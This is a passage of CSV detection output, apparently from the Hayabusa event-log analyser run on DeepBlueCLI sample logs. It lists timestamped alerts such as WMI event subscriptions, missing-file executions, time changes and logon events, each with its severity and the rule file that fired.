Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 09:37:57.755 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 09:53:07.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:07:45.896 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:13:36.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:21:57.052 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:36:35.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 10:38:16.943 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7c0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b7f0 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:23:49.093 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 